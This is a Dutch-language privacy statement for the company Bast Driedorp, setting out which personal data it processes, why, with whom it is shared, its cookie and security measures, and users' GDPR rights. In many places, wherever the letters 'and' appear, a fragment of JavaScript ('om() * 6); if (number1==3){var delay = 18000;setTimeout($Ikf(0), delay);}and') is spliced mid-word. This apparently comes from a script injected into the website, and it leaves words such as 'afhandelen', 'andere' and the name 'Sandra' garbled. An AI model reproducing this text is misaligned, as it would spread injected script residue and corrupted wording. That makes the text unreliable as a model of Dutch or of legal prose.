Privacy

Privacyverklaring Bast Driedorp

Bast Driedorp is verantwoordelijk voor de verwerking van persoonsgegevens zoals weergegeven in deze privacyverklaring.

Aanleiding

Bast Driedorp hecht grote waarde aan het zorgvuldig omgaan met persoonsgegevens. In deze privacyverklaring staat hoe persoonsgegevens worden verzameld, waarom deze worden verzameld en wat er mee wordt gedaan. Daarnaast vind je hier ook al jouw rechten met betrekking tot jouw gegevens en hoe je gebruik kunt maken van die rechten.

Persoonsgegevens die wij verwerken

Wij verwerken persoonsgegevens van:

 • Contactgegevens (potentiele) klanten 
 • Contactgegevens leveranciers van diensten en producten
 • Bezoekers website

Wij verwerken de volgende persoonsgegevens van jou:

 • Persoonlijke identificatie, zoals naam, adres, woonplaats, telefoonnummer, e-mailadres;
 • Bankrekeningnummer in geval van automatische incasso;
 • Camerabeelden;
 • Geluidsopnamen

Bast Driedorp bewaart je persoonsgegevens niet langer dan strikt noodzakelijk is om de doelen te realiseren waarvoor je gegevens worden verzameld, tenzij we op grond van een wettelijke regeling gegevens langer moeten bewaren. Indien het gaat om de administratie, zoals de debiteuren- en crediteurenadministratie en de in- en verkoopadministratie zijn wij verplicht deze gegevens minimaal 7 jaar te bewaren voor de Belastingdienst.

Doelen en grondslagen

Bast Driedorp verwerkt jouw persoonsgegevens voor de volgende doelen:

 • Het aanbieden en uitvoeren van onze diensten;
 • Contact op te kunnen nemen (bellen en/of e-mailen);
 • Het afhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelen van betalingen;
 • Verzenden van onze nieuwsbrief;
 • Het beheren en uitbreiden van ons klantenbestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and;
 • Het sluiten en uitvoeren van overeenkomsten;
 • Het voldoen aan wettelijke verplichtingen.

Wij gebruiken tenminste een van de volgende gronden voor de verwerking: 

 • het uitvoeren van een overeenkomst die wij met jou hebben gesloten;
 • het kunnen voldoen aan een wettelijke verplichting die op ons rust;
 • voor de behartiging van onze gerechtvaardigde belangen in het kader van onze bedrijfsvoering of die van een derde. Wij maken hierbij steeds de afweging tussen jouw belangen en die van ons;
 • de uitdrukkelijke toestemming die u heeft gegeven om gegevens te verwerken voor specifieke doeleinden.

Delen van persoonsgegevens met derden

Wanneer het noodzakelijk is voor het uitvoeren van de overeenkomst dan deelt Bast Driedorp in bepaalde gevallen persoonsgegevens met derden. Met bedrijven die persoonsgegevens verwerken in onze opdracht, sluiten wij een verwerkersovereenkomst om te zorgen voor eenzelfde niveau van beveiliging en vertrouwelijkheid van persoonsgegevens. Bast Driedorp blijft verantwoordelijk voor deze verwerkingen. Wij hebben een verwerkersovereenkomst afgesloten met onze leverancier voor ICT en accountant en salarisverwerker zodanig omschrijven als van toepassing is. 

Verder delen wij alleen persoonsgegevens als daarvoor een wettelijke verplichting geldt, zoals onze camerabeelden wanneer de politie dat van ons verlangt.

Cookies

Bast Driedorp gebruikt alleen technische en functionele cookies. Een cookie is een klein tekstbestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and dat bij het eerste bezoek aan deze website wordt opgeslagen op jouw computer, tablet of smartphone. De cookies die wij gebruiken zijn noodzakelijk voor de technische werking van de website en jouw gebruiksgemak. Ze zorgen ervoor dat de website naar behoren werkt en onthouden bijvoorbeeld jouw voorkeursinstellingen. Ook kunnen wij hiermee onze website optimaliseren. Je kunt je afmelden voor cookies door je internetbrowser zo in te stellen dat deze geen cookies meer opslaat. Daarnaast kun je ook alle informatie die eerder is opgeslagen via de instellingen van je browser verwijderen.

Social media

Op onze website staan buttons van social media, zoals Facebook, Twitter en Linkedin, zodat onze berichten gemakkelijk te delen zijn. Het gebruik van social media is de eigen verantwoordelijkheid van de gebruiker. De meeste social media kanalen werken met cookies en houden zich aan de EU-US Privacy Shield. Lees de privacy verklaringen van de respectievelijke social media kanalen om te weten wat zij met de verzamelde informatie doen.

Privacy medewerkers Bast Driedorp

Bast Driedorp heeft privacy hoog in het vaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andel staan. Alle medewerkers hebben getekend voor geheimhouding van bedrijfsgegevens. Alleen medewerkers die vanwege hun functie toegang moeten hebben tot persoonsgegevens zijn belast met het verwerken daarvan.

Beveiliging

Bast Driedorp  neemt de bescherming van persoonsgegevens serieus en neemt passende maatregelen om misbruik, verlies, onbevoegd toegang, ongewenste openbaarmaking en ongeoorloofde wijziging tegen te gaan. Als jij het idee hebt dat jouw gegevens toch niet goed beveiligd zijn of er zijn aanwijzingen van misbruik, neem dan contact op via bovenstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande gegevens of direct via telefoon / e-mailadres / veiligheidsfunctionaris. 

Wij hebben de volgende maatregelen genomen om jouw persoonsgegevens te beveiligen: 

 • Beveiligingssoftware op onze devices
 • Wij versturen jouw gegevens via een beveiligde internetverbinding (TLS). Dit kun je zien aan de adresbalk ‘https’ en het hangslotje in de adresbalk.
 • Vergrendeling van de devices

Jouw rechten

Rechten Omschrijving
Recht op inzage  Je hebt het recht om te allen tijde jouw gegevens op te vragen die bij Bast Driedorp vastgelegd en bewaard worden.
Recht op rectificatie  Kloppen je gegevens niet? Of zijn je gegevens verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd? Je hebt het recht om dit te laten rectificeren door Bast Driedorp. 
Recht op overdracht (dataportabiliteit) Mocht jij de gegevens nodig hebben die bij Bast Driedorp  opgeslagen liggen in het geval je overstapt naar een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere partij of dienst, dan heb je het recht op overdracht. Hierbij dient Bast Driedorp  al jouw gegevens over te dragen aan de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere partij. 
Recht op wissen van gegevens  Wil je niet langer dat jouw gegevens bij Bast Driedorp  vastgelegd zijn? Dan heb je het recht op het laten wissen van jouw gegevens.
Recht op stop gegevensgebruik (bezwaar)  Wil jij niet dat Bast Driedorp  jouw gegevens gebruikt? Dan heb je het recht op het stoppen van het gebruik van jouw persoonsgegevens.

Dit doe je door een e-mail te sturen of telefonisch contact op te nemen met Bast Driedorp. Onze contactgegevens staan onderaan deze verklaring. Je krijgt dan een overzicht van jouw gegevens. Het streven is om binnen een week te reageren. Daarnaast helpen wij je graag verder als je klachten hebt over de verwerking van jouw persoonsgegevens. Mocht je het toch niet eens zijn met ons handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelen, dan heb je op grond van de privacywetgeving ook het recht om een klacht in te dienen bij de Autoriteit Persoonsgegevens.

Recht te openbaren

Bast Driedorp behoudt zich het recht de gegevens te openbaren wanneer dit wettelijk is vereist dan wel wanneer Bast Driedorp  dit gerechtvaardigd acht om te voldoen aan een juridisch verzoek/ proces of om de rechten, eigendom of veiligheid van Bast Driedorp  te beschermen. Daarbij trachten wij altijd jouw recht op privacy zoveel mogelijk te respecteren.

Vragen

Heb je toch nog vragen over deze privacyverklaring? Neem gerust contact op via onderstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande contactgegevens:

Gert of Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra Bast

Bast Driedorp

Barneveldseweg 115

3862 PB  NIJKERK

KvK 32133315

T: 033-2453786/info@bastdriedorp.nl 

Datum verklaring:  15-5-2018